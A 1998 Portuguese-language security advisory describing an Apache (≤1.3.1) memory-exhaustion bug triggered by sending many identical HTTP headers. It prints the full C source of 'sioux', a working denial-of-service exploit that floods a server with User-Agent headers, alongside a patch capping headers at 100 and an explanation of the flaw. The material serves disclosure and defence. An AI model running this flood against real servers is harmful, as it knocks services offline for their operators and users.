sekure/uground industries - Security Bulletim

        ........................................................
                          www.sekure.org


                    -> sekure.03-98.apache <-


1. Descricao
'`'`'`'`'`'`

Uma vulnerabilidade foi encontrada em todos os servidores HTTP Apache
ate versao 1.3.1 .O problema se encontra no metodo como o Apache trata
de headers enviadas pelo cliente.

2. Comprometimento
'`'`'`'`'`'`'`'`'`

Aumento do consumo de memoria ocupada pelo Apache.
Com o envio de 10,000 headers o consumo de memoria sobe para
aproximadamente 380Mb.

3. Testando a vulnerabilidade
'`'`'`'`'`'`'`'`'`'`'`'`'`'`'
Aqui esta um exploit chamado sioux que explora esta vulnerabilidade.
Ele funciona abrindo uma conexao TCP com o servidor Apache e enviando
varios headers iguais.

/*-
 * Copyright (c) 1998 Dag-Erling Coïdan Smørgrav
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer
 *    in this position and unchanged.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. The name of the author may not be used to endorse or promote products
 *    derived from this software withough specific prior written permission
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
 * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
 * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
 * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
 * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
 * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
 * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
 * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
 * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
 * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 *
 */

/*
 * Kudos to Mark Huizer who originally suggested this on freebsd-current
 */

#include <sys/types.h>

#include <sys/socket.h>
#include <netinet/in.h>

#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

void
usage(void)
{
    fprintf(stderr, "usage: sioux [-a address] [-p port] [-n num]\n");
    exit(1);
}

int
main(int argc, char *argv[])
{
    struct sockaddr_in sin;
    struct hostent *he;
    FILE *f;
    int o, sd;

    /* default parameters */
    char *addr = "localhost";
    int port = 80;
    int num = 1000;

    /* get options */
    while ((o = getopt(argc, argv, "a:p:n:")) != EOF)
        switch (o) {
        case 'a':
            addr = optarg;
            break;
        case 'p':
            port = atoi(optarg);
            break;
        case 'n':
            num = atoi(optarg);
            break;
        default:
            usage();
        }

    if (argc != optind)
        usage();

    /* connect */
    if ((he = gethostbyname(addr)) == NULL) {
        perror("gethostbyname");
        exit(1);
    }
    bzero(&sin, sizeof(sin));
    bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
    sin.sin_family = he->h_addrtype;
    sin.sin_port = htons(port);

    if ((sd = socket(sin.sin_family, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        perror("socket");
        exit(1);
    }

    if (connect(sd, (struct sockaddr *)&sin, sizeof(sin)) == -1) {
        perror("connect");
        exit(1);
    }

    if ((f = fdopen(sd, "r+")) == NULL) {
        perror("fdopen");
        exit(1);
    }

    /* attack! */
    fprintf(stderr, "Going down like a plague of locusts on %s\n", addr);
    fprintf(f, "GET / HTTP/1.1\r\n");
    while (num-- && !ferror(f))
        fprintf(f, "User-Agent: sioux\r\n");

    if (ferror(f)) {
        perror("fprintf");
        exit(1);
    }

    fclose(f);
    exit(0);
}

4. Medidas Preventivas
'`'`'`'`'`'`'`'`'`'`'`


Patch provisorio para Apache 1.3.1 por Ben Laurie:


<-> corte aqui <->

diff -u -r1.229 http_protocol.c
--- http_protocol.c     1998/08/06 17:30:30     1.229
+++ http_protocol.c     1998/08/07 23:02:56
@@ -714,6 +714,7 @@
     int len;
     char *value;
     char field[MAX_STRING_LEN];
+    int nheaders=0;

     /*
      * Read header lines until we get the empty separator line, a read error,
@@ -723,6 +724,11 @@
         char *copy = ap_palloc(r->pool, len + 1);
         memcpy(copy, field, len + 1);

+        if(++nheaders == 100) {
+           r->status = HTTP_BAD_REQUEST;
+           return;
+       }
+
         if (!(value = strchr(copy, ':'))) {     /* Find the colon separator */
             r->status = HTTP_BAD_REQUEST;       /* or abort the bad request */
             return;
<-> corte aqui <->

Examinando o codigo temos:

memcpy(copy, field, len + 1);

Aqui se encontra o problema, enquanto forem enviadas headers, o Apache vai
aloca-las. Por causa do sistema de memoria do Apache, a memoria nao eh limpa
neste loop, deixando a cada vez maior.
Este patch funciona limitando o numero de headers enviadas em uma conexao para
100.

5. Contatos
'`'`'`'`'`'

 sekure/uground industries - Security Bulletim
 uma publicacao da sekure/uground industries (tm)
 http://www.sekure.org - contatos: security@sekure.org

 Procure pelos advisories da sekure/uground industries em
 http://www.sekure.org/advisories.html

 Assine a lista Best Of Security Brasil - http://www.sekure.org/bos
 Mande mensagem pra bos-br-request@sekure.org
 Ponha "subscribe bos-br" no corpo da mensagem.


----
texto: dumped - dumped@sekure.org
sekure/uground industries (tm) - 1998